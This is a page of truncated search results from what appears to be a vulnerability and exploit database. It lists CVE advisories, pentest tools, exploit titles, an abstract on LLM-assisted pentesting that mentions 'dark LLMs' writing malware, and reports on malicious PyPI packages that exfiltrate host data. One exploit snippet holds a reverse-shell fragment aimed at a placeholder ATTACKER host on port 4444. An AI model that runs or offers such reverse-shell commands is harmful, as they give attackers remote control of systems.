7198 matches found
PT-2026-32896
Name of the Vulnerable Software and Affected Versions: DRC Central Office Services (COS), affected versions not specified. Description: An unauthenticated configuration file modification issue allows an attacker to modify the server configuration file. This could lead to mass data exfiltration, malicio...
Bluetooth-app
Bluetooth Security Testing App A Kivy-based Android applicati...
Vulnerability Assessment vs Penetration Testing: What Security Leaders Need to Know
Your organization runs quarterly vulnerability scans. You get a report with hundreds, sometimes thousands, of findings. Your team patches what they can and moves on. Six months later, you bring in a penetration testing firm, and they walk right through your defenses using a chain of...
xss_hunter.py
EnterXSS Fuzzer – Automated Cross-Site Scripting Detection...
CVE-2026-6179
CVE-2026-6179 concerns a stored cross-site scripting (XSS) vulnerability in NightWolf Penetration Testing Platform. The affected entry states that an attacker can trigger and run malicious script in a user’s browser due to a stored XSS flaw, enabling impact on user-side confidentiality and integr...
Towards Automated Pentesting with Large Language Models
Large Language Models (LLMs) are redefining offensive cybersecurity by allowing the generation of harmful machine code with minimal human intervention. While attackers take advantage of dark LLMs such as XXXGPT and WolfGPT to produce malicious code, ethical hackers can follow similar approaches to...
NightWolf Penetration Testing Platform security vulnerability
NightWolf Penetration Testing Platform is an open-source cybersecurity testing tool developed by NightWolf. It is designed specifically for red teams and penetration testers, used for vulnerability exploitation, privilege escalation, and lateral movement testing. The NightWolf Penetration Testing...
Exploit for CVE-2020-24586
Fracture FragAttacks WiFi Penetration Framework CVE-202...
patchbot
patchbot patchbot is an AI-assisted security reviewer for p...
Exploit for Deserialization of Untrusted Data in Facebook React
R2SAE - React2Shell Auto-Exploit A Firefox extension...
pentest-autopilot-mcps
Pentest Autopilot MCP Servers Professional-grade Model Contex...
Exploit for Path Traversal in Gogs
CVE-2025-8110 — Gogs & /dev/tcp/ATTACKER/4444 0&1"' Cleanu...
GHSA-HR2V-4R36-88HR vulnerabilities
Vulnerabilities for packages: pluto, helm-set-status, cilium-cli, zot, kubescape, tw, consul-k8s, teleport, cluster-api-helm-controller, k9s, trivy-operator, nova, cerbos, cert-manager-cmctl, kuma, trivy, flux, kots, envoy-gateway, k8ssandra-client, helm-docs, linkerd2, tigera-operator, istio,...
CVE-2026-35206 vulnerabilities
Vulnerabilities for packages: pluto, helm-set-status, cilium-cli, zot, kubescape, tw, consul-k8s, teleport, cluster-api-helm-controller, k9s, trivy-operator, nova, cerbos, cert-manager-cmctl, kuma, trivy, flux, kots, envoy-gateway, k8ssandra-client, helm-docs, linkerd2, tigera-operator, istio,...
GHSA-HR2V-4R36-88HR vulnerabilities
Vulnerabilities for packages: trivy-operator, cilium-cli, kots, kube-arangodb, flux-source-controller, chaos-mesh, linkerd2-fips, teleport, chaos-mesh-fips, helm-diff-fips, gitlab-operator-fips, helm-exporter-fips, pluto-fips, helm-exporter, flux, tigera-operator-fips, zarf, cloudbeat, flux-fips,...
Malicious code in gd-auth-sso (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 8f23b8545f85df66640646272b028ab4db1032fcb4fd5bbd745971b3438cc4f1 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-2536 Malicious code in yhaplo1 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 ea4e6c1525395c0b55d0de437d61b31250561c4901199518e13cd28fe15f232f Dependency confusion attempt. The user identifies themselves as a HackerOne user abusing the PyPI for the purpose of a bug bounty program. This package did not...
Malicious code in bonsaitree1 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 0c35db41a5cf0a0671b33adf698777ebb63055a4f5ab3076bf3ed563a875cbb6 Dependency confusion attempt. The user identifies themselves as a HackerOne user abusing the PyPI for the purpose of a bug bounty program. This package did not...
MAL-2026-2533 Malicious code in phasedibd (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 8d514af72edb0054d9c5ff73f59a8517927dc660a5a58c8a03baf8abc5b22365 Dependency confusion attempt. The user identifies themselves as a HackerOne user abusing the PyPI for the purpose of a bug bounty program. This package did not...
Malicious code in noonhelpers (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 c2cb54ce39fd435f904d72dbbb5eef46166291adcd5106ea8d74d3c3c66aa3a5 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...